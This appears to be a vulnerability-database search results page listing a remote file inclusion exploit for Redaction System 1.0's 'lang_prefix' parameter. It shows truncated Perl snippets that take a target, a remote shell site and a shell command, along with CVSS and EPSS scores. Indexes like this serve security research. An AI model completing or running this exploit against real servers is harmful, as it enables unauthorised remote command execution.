1382 matches found
Redaction System 1.0 (lang_prefix) Remote File Include Exploit
Exploit for unknown platform in category web applications ============================================================== Redaction System 1.0 langprefix Remote File Include Exploit ============================================================== !/usr/bin/perl use LWP::UserAgent; $target = @ARGV0;...
7.1AI score
SaveExploits0
Redaction System 1.0 - 'lang_prefix' Remote File Inclusion
!/usr/bin/perl use LWP::UserAgent; $target = @ARGV0; $shellsite = @ARGV1; $shellcmd = @ARGV2; $fileno = @ARGV3; if!$target || !$shellsite usage; header; if $fileno eq 1 $file = " conn.php?langprefix="; elsif $fileno eq 2 $file = "index.php?lang="; elsif $fileno eq 3 $file =...
7.5CVSS5.8AI score0.09644EPSS
SaveExploits1
20